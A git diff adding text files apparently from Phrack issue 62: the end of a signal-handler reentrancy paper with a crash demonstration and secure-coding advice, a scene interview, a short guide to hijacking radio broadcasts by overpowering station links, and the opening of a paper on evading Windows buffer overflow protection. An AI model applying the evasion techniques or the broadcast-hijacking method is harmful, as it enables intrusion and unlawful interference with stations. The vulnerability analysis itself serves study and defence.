+The above program defines a signal handler which frees allocated heap memory, 
+and sleeps for around 10 seconds.  However, once the signal handler has been 
+entered, signals are not blocked, and thus can still be freely delivered.  As
+we learnt above, a duplicate call of free() on an already free()d memory area
+will result in "undefined behavior" - possibly corruption of the heap memory.
+As we can see, user-defined data is taken, and syslog() is also called fromo
+the sig handler function - but how does syslog() work? 'syslog()' creates a
+memory buffer stream, using two malloc() invokations - the first one allocates
+a 'stream description structure', whilst the other creates a buffer suitable
+for the actual syslog message data. This basis is essentially used to maintain
+a tempory copy of the syslog message.
+
+But why can this cause problems in context of co-usage of non-reentrant 
+routines?  To find the answer, let's experiment a little, by attempting to 
+exploit the above program, which happens to be vulnerable.
+
+--- output ---
+[shaun@localhost shaun]$ ./test `perl -e 'print
+"a"x100'` `perl -e 'print 
+"b"x410'` & sleep 1 ; killall -HUP test ; sleep 1 ;
+killall -TERM test
+[1] 2877
+Entered sighdlr()...
+Entered sighdlr()...
+[1]+  Segmentation fault      (core dumped) ./test
+`perl -e 'print "a"x100'` 
+`perl -e 'print "b"x410'`
+[shaun@localhost shaun]$ gdb -c core.2877
+GNU gdb 5.2.1-2mdk (Mandrake Linux)
+Copyright 2002 Free Software Foundation, Inc.
+GDB is free software, covered by the GNU General
+Public License, and you are
+welcome to change it and/or distribute copies of it
+under certain conditions.
+Type "show copying" to see the conditions.
+There is absolutely no warranty for GDB.  Type "show
+warranty" for details.
+This GDB was configured as "i586-mandrake-linux-gnu".
+Core was generated by `./test 
+aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa'.
+Program terminated with signal 11, Segmentation fault.
+#0  0x4008e9bb in ?? ()
+(gdb) info reg
+eax            0x61616161       1633771873
+ecx            0x40138680       1075021440
+edx            0x6965fa38       1768290872
+ebx            0x4013c340       1075036992
+esp            0xbfffeccc       0xbfffeccc
+ebp            0xbfffed0c       0xbfffed0c
+esi            0x80498d8        134519000
+edi            0x61616160       1633771872
+eip            0x4008e9bb       0x4008e9bb
+eflags         0x10206  66054
+cs             0x23     35
+ss             0x2b     43
+ds             0x2b     43
+es             0x2b     43
+fs             0x2b     43
+gs             0x2b     43
+fctrl          0x0      0
+fstat          0x0      0
+ftag           0x0      0
+fiseg          0x0      0
+fioff          0x0      0
+foseg          0x0      0
+fooff          0x0      0
+---Type <return> to continue, or q <return> to quit---
+fop            0x0      0
+xmm0           {f = {0x0, 0x0, 0x0, 0x0}}       {f = {0, 0, 0, 0}}
+xmm1           {f = {0x0, 0x0, 0x0, 0x0}}       {f = {0, 0, 0, 0}}
+xmm2           {f = {0x0, 0x0, 0x0, 0x0}}       {f = {0, 0, 0, 0}}
+xmm3           {f = {0x0, 0x0, 0x0, 0x0}}       {f = {0, 0, 0, 0}}
+xmm4           {f = {0x0, 0x0, 0x0, 0x0}}       {f = {0, 0, 0, 0}}
+xmm5           {f = {0x0, 0x0, 0x0, 0x0}}       {f = {0, 0, 0, 0}}
+xmm6           {f = {0x0, 0x0, 0x0, 0x0}}       {f = {0, 0, 0, 0}}
+xmm7           {f = {0x0, 0x0, 0x0, 0x0}}       {f = {0, 0, 0, 0}}
+mxcsr          0x0      0
+orig_eax       0xffffffff       -1
+(gdb) quit
+[shaun@localhost shaun]$
+--- EOF ---
+
+Interesting.  As we can see above, our large string of 'a's has found its way
+into several program registers on stack - EAX and EDI. From this, we can
+assume we are witnessing the "undefined behavior" we discussed earlier, when
+the signal handler is reentered.
+
+When the sample vulnerable program receives the second signal (SIGTERM), since
+signals are not being ignored, the signal handler is reentered to handle this
+second signal, causing something to go very wrong.
+But why is this happening?
+
+Since the second memory region (*data2) was free()d during the first entry of
+the signal handler, syslog() re-uses this released memory for its own
+purposes - storing its syslog message, because as the short syslog()
+explanation above stated, two malloc() calls are present in most syslog()
+implementations, and thus it re-uses the newly free()d memory - *data2. 
+After the usage of the memory once held as data2 by syslog(), a second
+'free()' call is made on the memory region, because of reentry of the signal
+handler function.  As the free(3) man page stated, undefined behavior *will*
+occur if the memory area was already free()d, and we happen to know that this
+was the case.  So when 'free()' was called again on *data2, free() landed
+somewhere in the area containing the 'a's (hence 0x61 in hex), because
+syslog() had re-used the freed area to store the syslog message, temporarily.
+
+As the GDB output above illustrates, as long as user-input is used by
+'syslog()' (and it is in this case), we have some control over the program
+registers, when this "undefined behavior" (corruption of heap in most
+cases) occurs.  Because of this ability, exploitation is most likely a
+possibility - it is left as an exercise to the reader to play with this sample
+vulnerable program a little more, and determine if the vulnerability is
+exploitable.
+
+
+For the interested reader, 'free()' is not the only non-reentrant glibc 
+function.  In general, it can be assumed that all glibc functions which are NOT
+included within the following list are non-reentrant, and thus are not safe to
+be used in signal handlers.
+
+--
+           _exit(2), access(2), alarm(3), cfgetispeed(3), cfgetospeed(3),
+           cfsetispeed(3), cfsetospeed(3), chdir(2), chmod(2), chown(2),
+           close(2), creat(3), dup(2), dup2(2), execle(3), execve(2),
+           fcntl(2), fork(2), fpathconf(2), fstat(2), fsync(2), getegid(2),
+           geteuid(2), getgid(2), getgroups(2), getpgrp(2), getpid(2),
+           getppid(2), getuid(2), kill(2), link(2), lseek(2), mkdir(2),
+           mkfifo(2), open(2), pathconf(2), pause(3), pipe(2), raise(3),
+           read(2), rename(2), rmdir(2), setgid(2), setpgid(2), setsid(2),
+           setuid(2), sigaction(2), sigaddset(3), sigdelset(3),
+           sigemptyset(3), sigfillset(3), sigismember(3), signal(3),
+           sigpause(3), sigpending(2), sigprocmask(2), sigsuspend(2),
+           sleep(3), stat(2), sysconf(3), tcdrain(3), tcflow(3), tcflush(3),
+           tcgetattr(3), tcgetpgrp(3), tcsendbreak(3), tcsetattr(3),
+           tcsetpgrp(3), time(3), times(3), umask(2), uname(3), unlink(2),
+           utime(3), wait(2), waitpid(2), write(2)."
+
+--                    
+
+
+
+Secure Signal Handling
+#######################
+
+In general, signal handling vulnerabilities can be prevented by
+
+--
+
+1) Using only reentrant glibc functions within signal handlers -
+
+This safe-guards against the possibility of "undefined behavior" or otherwise
+as presented in the above example.  However, this isn't *always* feasible, 
+especially when a programmers needs to accomplish tasks such as freeing
+memory.
+
+Other counter-measures, in this case, can protect against this. See below.
+
+2) ignoring signals during signal handling routines -
+
+As the obvious suggests, this programming practice will indefinately prevent
+handling of signals during the execution of signal handling routines, thus
+preventing signal handler reentry.
+
+Consider the following signal handler template:
+
+--- sighdlr.c ---
+void sighdlr() {
+        signal(SIGINT, SIG_IGN);
+        signal(SIGABRT, SIG_IGN);
+        signal(SIGHUP, SIG_IGN);
+        /* ...ignore other signals ... */
+
+        /* cleanup code here */
+
+        exit(0);
+}
+--- EOF ---
+
+As we can see above, signals are blocked before doing anything else in the
+signal handling routine.  This guarantees against signal handler reentry (or
+almost does).
+
+3) Ignoring signals whilst non-atomic process modifications are in place -
+
+This involves blocking signals, in a similar way to the above code snippet,
+during the execution of code with non-atomic modifications in place, such as
+code execution with superuser privileges.
+
+Consider the following code snippet:
+
+--- nonatomicblock.c ---
+/* code exec with non-atomic process modifications
+starts here... */
+signal(SIGINT, SIG_IGN);
+signal(SIGABRT, SIG_IGN);
+signal(SIGHUP, SIG_IGN);
+/* block other signals if desired... */
+
+setuid(0);
+/* sensitive code here */
+
+setuid(getuid());
+/* sensitive code ends here */
+
+signal(SIGINT, SIG_DFL);
+signal(SIGABRT, SIG_DFL);
+signal(SIGHUP, SIG_DFL);
+
+/* ...code here... */
+--- EOF ---
+
+Before executing privileged code, signals are blocked. After execution of the
+privileged code, privileges are dropped, and the signal action is set back to
+the default action.
+
+There are probably more ways of preventing signal vulnerabilities, but the
+three above should be enough to implement semi-safe signal handlers.
+
+
+
+Conclusion
+###########
+
+I hope this paper has at least touched upon possible problems encountered when
+dealing with signals in C applications.  If nothing else can be taken away from
+this paper, my aim is to have outlined that secure programming practices should
+always be applied when implementing signal handlers. 
+Full stop.  Remember this.
+
+If I have missed something out, given inaccurate information, or otherwise,
+please feel free to drop me a line at the email address at the top of the
+paper, providing your comments are nicely phrased.
+
+Recommended reading is presented in the Bibliography below.
+
+
+
+Bibliography
+#############
+
+Recommended reading material is:
+
+--
+"Delivering Signals for Fun and Profit" -
+http://razor.bindview.com/publish/papers/signals.txt,
+Michal Zalewski.  Michal's
+
+paper was a useful resource when writing this paper, and many ideas were gained
+from this paper.  Thanks Michal.
+
+"Introduction To Unix Signals Programming" -
+http://users.actcom.co.il/~choo/lupg/tutorials/signals/signals-programming.html,LUGPs.
+
+"Procmail insecure signal handling vulnerability" - 
+http://xforce.iss.net/xforce/xfdb/6872
+
+"Traceroute signal handling vulnerability" -
+http://lwn.net/2000/1012/a/traceroute.php3
+
+"signal(2) man page" -
+http://techpubs.sgi.com/library/tpl/cgi-bin/getdoc.cgi?coll=linux&db=man&fname=/usr/share/catman/man2/signal.2.html&srch=signal
+
+"signal(7) man page" -
+http://techpubs.sgi.com/library/tpl/cgi-bin/getdoc.cgi?coll=linux&db=man&fname=/usr/share/catman/man7/signal.7.html&srch=signal
+
+--
+
+
+
+Greets
+#######
+
+Greets to:
+
+--
+Friends at HDC (or former HDC members), excluded.org,
+#hackcanada, all @ GSO,
+rider (happy be-lated birthday!).
+
+All the other great people that I have met online.
+--
+
+Thanks guys.
+
+
+Thank you for your time.
+Shaun.
+
+|=----------------------------------------------------------------------=|
+|=----------------------------------------------------------------------=|
+
+|=------------------=[ Pirating A Radio Station ]=----------------------=|
+                       by j kuinga" <kuinga@hotmail.com>
+
+At many Radio Stations to cut costs they now do what is called "central 
+casting."  This is where many feeds are produced from one building and 
+handled by a group of engineers.
+
+Why is this important?  You could, disrupt the broadcast from the Central 
+Site, to the tower site, and create your own programming, without the 
+hassles of buying a transmitter,  getting the FCC licensing, and that type 
+of thing.  We're showing you two different ways to have some fun--by 
+interrupting remote broadcasts, and by overtaking the radio station.
+
+Radio Stations typically have Martis which are mini-transmitters, and 
+Marti Repeaters, typically in the 425-455 MHz Range.  Some Ham Transmitters 
+will work in this range, and if not, check your local radio surplus store.
+
+Martis are typically used to rebroadcast High School Football and 
+basketball games, as well as commercial "live events" and its something as 
+simple as over-powering the signal, in order to get your message through.  
+Be forewarned, there typically is a live person on the other end of that 
+transmitterXtheyre probably not paying attention, because theyre 
+getting paid $5.50/hourXbut, they have they ability to turn you off.
+
+How to find the frequency?  Well, you could always SE the engineer at the 
+station and ask, however, most of them are grumpy old radio buffs, so you 
+might not get anywhere.  I suggest a good copy of Police Call, which has 
+a LOT of frequencies in there for things like radio stations.
+
+I use a home-made setup for finding particular frequencies out.  Having some 
+essential tools like a good, directional antenna, frequency counter, and 
+very accurate transmitter, along with breadboard and essential components, 
+typically are common in finding what you need to know.  I also drive a Big 
+White Van, complete with Mast and Bucket, so I can optimally 'place' the 
+antenna at the right height and direction, that I obtained at a school 
+auction for reallly cheap. (e.g., under $500, even had 18" racks in it and a 
+nice generator)
+
+Most Radio Stations doing this have what they call a STL, or Studio to 
+Transmitter Link.  This is typically in the 800 or 900 Mhz range, and the 
+same, general ideas apply.  You find the general direction in which the 
+antenna is pointed, then you overpower the signal.  Since you 
+(idealistically) would be within a few miles of the transmitter, not 30 or 
+50 miles like the Central-Casting spot, you would overpower the transmitter, 
+and start your own pirate radio station.  Most stations however, have an 
+Air monitor, and can turn the remote transmitter off by pressing a 
+button on their STL.  However, if youre closer to it, youve got control 
+until the station engineer comes down to manually pull the plug on your 
+transmitter.
+
+If you see black vans with antennas and they look like they're doing sweeps, 
+chances are, they're either a) with the audit crew of the local cable 
+company, or b) looking for your ass.
+
+kuinga@hotmail.com
+
+
+|=[ EOF ]=---------------------------------------------------------------=|
+
diff --git a/phrack62/4.txt b/phrack62/4.txt
new file mode 100644
index 0000000..68d5218
--- /dev/null
+++ b/phrack62/4.txt
@@ -0,0 +1,241 @@
+phrack.org:~# cat .bash_history
+
+                            ==Phrack Inc.==
+
+              Volume 0x0b, Issue 0x3e, Phile #0x04 of 0x10
+
+|=---------------=[ P R O P H I L E   O N   S C U T ]=-------------------=|
+|=-----------------------------------------------------------------------=|
+|=------------------------=[ Phrack Staff ]=-----------------------------=|
+
+|=---=[ Specification
+
+                  Handle: scut
+                     AKA: "The Tower"
+           Handle origin: Result of spelling "SCUD rocket" as a 12 year
+                          old when making up a handle
+               catch him: by email scut@segfault.net
+        Age of your body: 23
+             Produced in: West Germany
+         Height & Weight: 198cm, 85kg
+                    Urlz: segfault.net/~scut/
+               Computers: COTS, anything goes ;)
+               Member of: TESO
+                Projects: exploitation methods, low level architecture
+                          wrangling, code analysis and transformation
+
+|=---=[ Favorite things
+
+
+          Women: intelligent, humorous, self-confident and caring
+           Cars: BMW = fast, functional and reliable
+          Foods: Chinese, German cake
+        Alcohol: Mixed drinks (Tequila + *), white wine
+          Music: U2, 60-70'ies, ambient, new age
+         Movies: Leon, Matrix
+Books & Authors: I dislike fiction, various scientific books
+           Urls: phrack.org/ ;-), citeseer.ist.psu.edu/directory.html
+         I like: digging some problem to the deepest level
+      I dislike: unjustified authorities, arrogance, ignorance
+
+|=---=[ Life in 3 sentences
+
+Born 1980, I just lived a normal peaceful life in Germany. Finished school,
+high school quite well, went to the military service, started studying.
+Currently I am studying abroad and thats possibly the most exciting experience
+so far ;-)
+
+|=---=[ Passions | What makes you tick
+
+To create. In anything I do, I enjoy creating something and deepen my
+understanding of it. Somehow, however, I lose interest as soon as I think I
+could understand something completely, but that it would take too much effort.
+
+|=---=[ Which research have you done or which one gave you the most fun?
+
+Looking back on the few things I have done, I think it was always fun to
+tickle people intellectually. The most fun was writing burneye, a simple
+runtime binary encryption program. I learned lots while doing it and it had
+some minor impact aswell. Also I wrote a paper about format string
+vulnerabilities. This was fun to write and back at that time everybody was
+very curious about this newly discovered class of security vulnerabilities.
+The basic work was already done and it was fun just to make a few steps
+further. While its always the case that you have to base your work on someone
+else's, sometimes you get the feeling of doing something truly new or
+creative. Then, its always fun.
+
+
+|=---=[ Memorable Experiences
+
+CCCamp 1999, when all TESO members first met eye-to-eye and where we had lots
+of fun together. Meeting interesting people, such as some of the ADM folks.
+
+All the CCC congresses and all the fun that comes with them: friends, beer,
+and new contacts. Meeting the THC guys, having beer with wilkins and plasmoid.
+
+
+|=---=[ Quotes
+
+"The purpose of computing is insight, not numbers." - Richard W. Hamming
+
+
+|=---=[ Open Interview - General boring questions
+
+Q: When did you start to play with computers?
+A: Due to my father working in the computing field I was lucky to first tap
+some keys at the age of six, around 1985. First hooked up through games I
+quickly liked the idea to control the machine myself and was fascinated to
+write my first BASIC program on the C64 when I was nine. This fascination has
+not decreased ever since, though the languages and computers changed a lot ;-)
+
+Q: When did you had your first contact to the 'scene'?
+A: As many of todays people in the hacking scene, the natural path leads
+through the warez and cracking realms. In 1995 I was browsing some BBS's and
+thats how I was drawn into that scene. Then, in the following two years, I
+moved away from Windows/Warez to more Linux/Programming, and more or less by
+end of 1997 I was completely into this thing.
+
+Q: When did you for your first time connect to the internet?
+A: Through the German Telekom BTX internet gateway, that must have been 1995.
+
+Q: What other hobbies do you have?
+A: Martial arts (currently Sanda Wushu, previously some Muaythai) and other
+sports, having fun with friends. Learning Chinese.
+
+Q: ...and how long did it take until you joined irc? Do you remember
+   the first channel you joined?
+A: #warez.de in 1996 on IrcNet.
+
+Q: What's your architecture / OS of choice?
+A: IA32 with Debian/sid. Its constantly updated, the packagers know their
+stuff and its a system by and for developers. I love it.
+
+|=---=[ Open Interview - More interesting questions
+
+Q: Who founded TESO and what's the meaning of the name?
+A: TESO was founded in 1998 by typo, edi, stanly and oxigen, some austrian
+hackers.
+
+Q: What's TESO up to these days?
+A: I would like to describe us as not active anymore. There are a couple of
+reasons for this. One is the natural shift of interest of members, such as
+when growing up and having a daytime job. But more importantly, the most
+previously most active members do not release their work under the TESO label
+anymore. Sometime ago, we also had internal trust problems where we did not
+know who leaked our internal stuff. This lead to general distrust and some
+developing stopped or slowed due to that. Sad thing.
+
+Q: You have helped phrack in many occasions. What do you think about Phrack?
+   What suggestions do you have for phrack?
+A: I think phrack is the single best starting point for anyone seriously
+interested in learning how to become a real low level hacker. One could start
+ten issues in the past and gradually sharpen the skills to almost the today's
+cutting edge. The style, quality and focus of the articles is very diverse and
+always makes for an interesting read.
+
+   In the past year, Phrack started to work closer with the authors of the
+articles to produce higher quality articles for the readers. This is a great
+idea! Maybe further steps into this direction could follow.
+
+   For the article topics, I personally would like to see more articles on
+upcoming technologies to exploit, such as SOAP, web services, .NET, etc.
+
+Q: What are you up to these days? How has the scene-life influenced your
+   lifestyle, goals and personality?
+A: Nowadays, I am more of a computer science student than a scene member. The
+scene did not change me so much. Its a great place to meet intelligent people
+and to discuss new ideas.
+
+Q: You have been in the scene for quite a while. If you look back, what
+   was the worst thing that happened to the scene? What was the best 
+   that happened?
+A: The worst was a bad long term development with an even worse backlash: the
+commercialization of the network security field. When the Internet really
+boomed, everybody was out to make a buck from selling security related
+products and services. A lot of former hackers "sold out". While its their
+personal choice to work in the security business and such business is not
+necessarily evil, for the scene it wasn't all that great.
+   The worse result has been the gap between once united hackers. Some people
+drew a more or less arbitrary line of black-/whitehatism and started dividing
+the scene even further. The result you can see nowadays is that there are some
+separated groups in the scene piling up non public knowledge, while the "entry
+level skill" required to really be in the scene is increased and less people
+get into the scene. Those knowledgeable groups still have "whitehats" among
+their members, but nobody cares, because for the group it just works well and
+everybody within wins. On a wider scale, everybody loses and the cooperation
+and development of really creative new stuff is slowed and the scene shrinks.
+   Fresh talented people wanting to get into the scene have no choice but to
+found their own teams.
+
+The best thing for the scene were and still are the hacker events organized
+all around the world. They are a great contact point of the hackers and to the
+outside world.
+
+Q: If you could turn the clock backwards, what would you do different
+   in your young life ?
+A: Be more relaxed about people posting my stuff although I did not wanted it
+to be public. It just caused trouble for everybody and in the end its more
+a fault on my side than on theirs.
+
+
+=---=[ One word comments
+
+[give a 1-word comment to each of the words on the left]
+
+IRC                                    : timeconsumptive
+TESO                                   : dreamteam
+ADM                                    : pioneers
+Hacker meetings                        : melting-pot
+Whitehats                              : do not always wear white hats
+Blackhats                              : do not always wear black hats
+
+
+|=---=[ Please tell our audience a worst case scenario into what the scene
+        might turn into.
+
+The extension to the bad development that already took place and I described
+in an earlier answer would include more company driven actions and sell outs.
+Possibly the worst long term thing for the scene would be a decrease in the
+scene's lose "infrastructure", such as magazines and conferences. This could
+be the result of stricter laws against hackers and already takes place in some
+countries. Imagine if the typical hacker conferences would be outlawed or
+strictly observed. Imagine when magazines such as Phrack would be shutdown.
+Imagine if groups like THC and websites like Packetstorm would be shutdown.
+That would be a bad development.
+
+
+|=---=[ And if everything works out fine? What's the best case scenario
+        you can imagine?
+
+The scene would be driven by discussions, new inventions, creative hacking
+stunts and a large number social events. Hackers would stick closer together,
+yet share more of their work, yet allowing newcomers to learn. People would
+not crawl for fame on mailing lists but would honestly respect each other.
+
+  To archieve this ideal, things that unite all hackers have to be valued
+more. All hackers share the enthusiasm for technology and creativity.
+Creativity is seldomly the result of sitting alone in a locked down room, but
+quite the opposite the result of many diverse ideas and discussions among
+intelligent people. If the environment hackers interact with each others in
+permits for exchange of ideas without getting ripped off by companies or other
+hackers, this would result in a great scene.
+
+
+|=---=[ Any suggestions/comments/flames to the scene and/or specific people?
+
+I think some young talents are really doing a great job. Keep going!
+
+
+|=---=[ Shoutouts & Greetings
+
+hendy, for being a long time trustable, reliable and humorous friend.
+stealth, die andere Nase, for intellectual challenges and always coming up
+  with really cool stuff.
+Halvar, skyper, gamma for making the hacker events real fun and organizing
+  everything.
+lorian, for being a smart guy.
+acpizer, for his wisdom and stubborness.
+The folks at THC and ADM for doing really cool stuff.
+
+|=[ EOF ]=---------------------------------------------------------------=|
+
diff --git a/phrack62/5.txt b/phrack62/5.txt
new file mode 100644
index 0000000..ae1f62b
--- /dev/null
+++ b/phrack62/5.txt
@@ -0,0 +1,1068 @@
+                           ==Phrack Inc.==
+
+              Volume 0x0b, Issue 0x3e, Phile #0x05 of 0x10
+
+
+|=-----------------------------------------------------------------------=|
+|=-----=[ Bypassing 3rd Party Windows Buffer Overflow Protection ]=------=|
+|=-----------------------------------------------------------------------=|
+|=--------------=[ anonymous <p62_wbo_a@author.phrack.org ]=-------------=|
+|=--------------=[ Jamie Butler <james.butler@hbgary.com> ]=-------------=|
+|=--------------=[ anonymous <p62_wbo_b@author.phrack.org ]=-------------=|
+
+
+
+--[ Contents
+
+
+  1 - Introduction
+
+  2 - Stack Backtracing
+
+  3 - Evading Kernel Hooks
+
+    3.1 - Kernel Stack Backtracing
+
+    3.2 - Faking Stack Frames
+
+  4 - Evading Userland Hooks
+
+    4.1 - Implementation Problems - Incomplete API Hooking
+
+          4.1.1 - Not Hooking all API Versions
+          4.1.2 - Not Hooking Deeply Enough
+          4.1.3 - Not Hooking Thoroughly Enough
+
+    4.2 - Fun With Trampolines
+
+          4.2.1 Patch Table Jumping
+          4.2.2 Hook Hopping
+
+    4.3 - Repatching Win32 APIs
+
+    4.4 - Attacking Userland Components
+
+          4.4.1 IAT Patching
+          4.4.2 Data Section Patching
+
+    4.5 - Calling Syscalls Directly
+
+    4.6 - Faking Stack Frames
+
+  5 - Conclusions
+
+
+
+--[ 1 - Introduction
+
+Recently, a number of commercial security systems started to offer
+protection against buffer overflows. This paper analyzes the protection
+claims and describes several techniques to bypass the buffer overflow
+protection.
+
+Existing commercial systems implement a number of techniques to protect
+against buffer overflows. Currently, stack backtracing is the most popular
+one. It is also the easiest to implement and the easiest to bypass.
+
+Several commercial products such as Entercept (now NAI Entercept) and
+Okena (now Cisco Security Agent) implement this technique.
+
+
+--[ 2 - Stack Backtracing
+
+Most of the existing commercial security systems do not actually prevent
+buffer overflows but rather try to attempt to detect the execution of
+shellcode.
+
+The most common technology used to detect shellcode is code page
+permission checking which involves checking whether code is executing on
+a writable page of memory. This is necessary since architectures such as
+x86 do not support the non-executable memory bit.
+
+Some systems also perform additional checking to see whether code's page
+of memory belongs to a memory mapped file section and not to an anonymous
+memory section.
+
+        [-----------------------------------------------------------]
+
+                page = get_page_from_addr( code_addr );
+                if (page->permissions & WRITABLE)
+                        return BUFFER_OVERFLOW;
+
+                ret = page_originates_from_file( page );
+                if (ret != TRUE)
+                        return BUFFER_OVERFLOW;
+
+        [-----------------------------------------------------------]
+               Pseudo code for code page permission checking
+
+Buffer overflow protection technologies (BOPT) that rely on stack
+backtracing don't actually create non-executable heap and stack segments.
+Instead they hook the OS and check for shellcode execution during the
+hooked API calls.
+
+Most operating systems can be hooked in userland or in kernel.
+
+Next section deals with evading kernel hooks, while section 4 deals with
+bypassing userland hooks.
+
+
+--[ 3 - Evading Kernel Hooks
+
+When hooking the kernel, Host Intrusion Prevention Systems (HIPS) must
+be able to detect where a userland API call originated. Due to
+the heavy use of kernel32.dll and ntdll.dll libraries, an API call is
+usually several stack frames away from the actual syscall trap call.
+For this reason, some intrusion preventions systems rely on using stack
+backtracing to locate the original caller of a system call.
+
+
+----[ 3.1 - Kernel Stack Backtracing
+
+While stack backtracing can occur from either userland or kernel, it is
+far more important for the kernel components of a BOPT than its userland
+components. The existing commercial BOPT's kernel components rely entirely
+on stack backtracing to detect shellcode execution. Therefore, evading a
+kernel hook is simply a matter of defeating the stack backtracing
+mechanism.
+
+Stack backtracing involves traversing stack frames and verifying that the
+return addresses pass the buffer overflow detection tests described above.
+Frequently, there is also an additional "return into libc" check, which
+involves checking that a return address points to an instruction
+immediately following a call or a jump. The basic operation of stack
+backtracing code, as used by a BOPT, is presented below.
+
+        [-----------------------------------------------------------]
+
+                while (is_valid_frame_pointer( ebp )) {
+                        ret_addr = get_ret_addr( ebp );
+
+                        if (check_code_page(ret_addr) == BUFFER_OVERFLOW)
+                                return BUFFER_OVERFLOW;
+
+                        if (does_not_follow_call_or_jmp_opcode(ret_addr))
+                                return BUFFER_OVERFLOW;
+
+                        ebp = get_next_frame( ebp );
+                }
+
+        [-----------------------------------------------------------]
+                    Pseudo code for BOPT stack backtracing
+
+When discussing how to evade stack backtracing, it is important to
+understand how stack backtracing works on an x86 architecture. A typical
+stack frame looks as follows during a function call:
+
+	:                         :
+        |-------------------------|
+        | function B parameter #2 |
+        |-------------------------|
+        | function B parameter #1 |
+        |-------------------------|
+        |    return EIP address   |
+        |-------------------------|
+        |        saved EBP        |
+        |=========================|
+        | function A parameter #2 |
+        |-------------------------|
+        | function A parameter #1 |
+        |-------------------------|
+        |    return EIP address   |
+        |-------------------------|
+        |        saved EBP        |
+        |-------------------------|
+	:                         :
+
+The EBP register points to the next stack frame. Without the EBP register
+it is very hard, if not impossible, to correctly identify and trace
+through all the stack frames.
+
+Modern compilers often omit the use of EBP as a frame pointer and use it
+as a general purpose register instead. With an EBP optimization, a stack
+frame looks as follows during a function call:
+
+        |-----------------------|
+        | function parameter #2 |
+        |-----------------------|
+        | function parameter #1 |
+        |-----------------------|
+        |   return EIP address  |
+        |-----------------------|
+
+Notice that the EBP register is not present on the stack. Without an EBP
+register it is not possible for the buffer overflow detection technologies
+to accurately perform stack backtracing. This makes their task incredibly
+hard as a simple return into libc style attack will bypass the protection.
+Simply originating an API call one layer higher than the BOPT hook defeats
+the detection technique.
+
+
+----[ 3.2 - Faking Stack Frames
+
+Since the stack is under complete control of the shellcode, it is possible
+to completely alter its contents prior to an API call. Specially crafted
+stack frames can be used to bypass the buffer overflow detectors.
+
+As was explained previously, the buffer overflow detector is looking for
+three key indicators of legitimate code: read-only page permissions,
+memory mapped file section and a return address pointing to an instruction
+immediately following a call or jmp. Since function pointers change
+calling semantics, BOPT do not (and cannot) check that a call or jmp
+actually points to the API being called. Most importantly, the BOPT cannot
+check return addresses beyond the last valid EBP frame pointer
+(it cannot stack backtrace any further).
+
+Evading a BOPT is therefore simply a matter of creating a "final" stack
+frame which has a valid return address. This valid return address must
+point to an instruction residing in a read-only memory mapped file section
+and immediately following a call or jmp. Provided that the dummy return
+address is reasonably close to a second return address, the shellcode can
+easily regain control.
+
+The ideal instruction sequence to point the dummy return address to is:
+
+        [-----------------------------------------------------------]
+
+                        jmp    [eax] ; or call [eax], or another register
+        dummy_return:   ...          ; some number of nops or easily
+                                     ; reversed instructions, e.g. inc eax
+                        ret          ; any return will do, e.g. ret 8
+
+        [-----------------------------------------------------------]
+
+
+Bypassing kernel BOPT components is easy because they must rely on user
+controlled data (the stack) to determine the validity of an API call. By
+correctly manipulating the stack, it is possible to prematurely terminate
+the stack return address analysis.
+
+This stack backtracing evasion technique is also effective against
+userland hooks (see section 4.6).
+
+
+--[ 4 - Evading Userland Hooks
+
+Given the presence of the correct instruction sequence in a valid region
+of memory, it is possible to trivially bypass kernel buffer overflow
+protection techniques. Similar techniques can be used to bypass userland
+BOPT components. In addition, since the shellcode executes with the same
+permissions as the userland hooks, a number of other techniques can be
+used to evade the detection.
+
+
+----[ 4.1 - Implementation Problems - Incomplete API Hooking
+
+There are many problems with the userland based buffer overflow protection
+technologies. For example, they require the buffer overflow protection
+code to be in the code path of all attacker's calls or the shellcode
+execution will go undetected.
+
+Trying to determine what an attacker will do with his or her shellcode
+a priori is an extremely hard problem, if not an impossible one. Getting
+on the right path is not easy. Some of the obstacles in the way include:
+
+     a. Not accounting for both UNICODE and ANSI versions of a Win32 API
+        call.
+
+     b. Not following the chaining nature of API calls. For example,
+        many functions in kernel32.dll are nothing more than wrappers for
+        other functions within kernel32.dll or ntdll.dll.
+
+     c. The constantly changing nature of the Microsoft Windows API.
+
+
+--------[ 4.1.1 - Not Hooking All API Versions
+
+A commonly encountered mistake with userland API hooking
+implementations is incomplete code path coverage. In order for an API
+interception based products to be effective, all APIs utilized by
+attackers must be hooked. This requires the buffer overflow protection
+technology to hook somewhere along the code path an attacker _has_ to
+take. However, as will be shown, once an attacker has begun executing
+code, it becomes very difficult for third party systems to cover all
+code paths. Indeed, no tested commercial buffer overflow detector actually
+provided an effective code path coverage. 
+
+Many Windows API functions have two versions: ANSI and UNICODE. The ANSI
+function names usually end in A, and UNICODE functions end in W because
+of their wide character nature. The ANSI functions are often nothing
+more than wrappers that call the UNICODE version of the API. For example,
+CreateFileA takes the ANSI file name that was passed as a parameter and
+turns it into an UNICODE string. It then calls CreateFileW. Unless a
+vendor hooks both the UNICODE and ANSI version of the API function, an
+attacker can bypass the protection mechanism by simply calling the other
+version of the function.
+
+For example, Entercept 4.1 hooks LoadLibraryA, but it makes no attempt
+to intercept LoadLibraryW. If a protection mechanism was only going to
+hook one version of a function, it would make more sense to hook the
+UNICODE version. For this particular function, Okena/CSA does a better
+job by hooking LoadLibraryA, LoadLibraryW, LoadLibraryExA, and
+LoadLibraryExW. Unfortunately for the third party buffer overflow
+detectors, simply hooking more functions in kernel32.dll is not enough. 
+
+
+--------[ 4.1.2 - Not Hooking Deeply Enough
+
+In Windows NT, kernel32.dll acts as a wrapper for ntdll.dll and yet many
+buffer overflow detection products do not hook functions within ntdll.dll.
+This simple error is similar to not hooking both the UNICODE and ANSI
+versions of a function. An attacker can simply call the ntdll.dll directly
+and completely bypass all the kernel32.dll "checkpoints" established by a
+buffer overflow detector.
+
+For example, NAI Entercept tries to detect shellcode calling
+GetProcAddress() in kernel32.dll. However, the shellcode can be rewritten
+to call LdrGetProcedureAddress() in ntdll.dll, which will accomplish the
+same goal, and at the same time never pass through the NAI Entercept hook.
+
+Similarly, shellcode can completely bypass userland hooks altogether and
+make system calls directly (see section 4.5).
+
+
+--------[ 4.1.3 - Not Hooking Thoroughly Enough
+
+The interactions between the various different Win32 API functions is
+byzantine, complex and difficult to understand. A vendor must make only
+one mistake in order to create a window of opportunity for an attacker.
+
+For example, Okena/CSA and NAI Entercept both hook WinExec trying to
+prevent attacker's shellcode from spawning a process.
+
+The call path for WinExec looks like this:
+
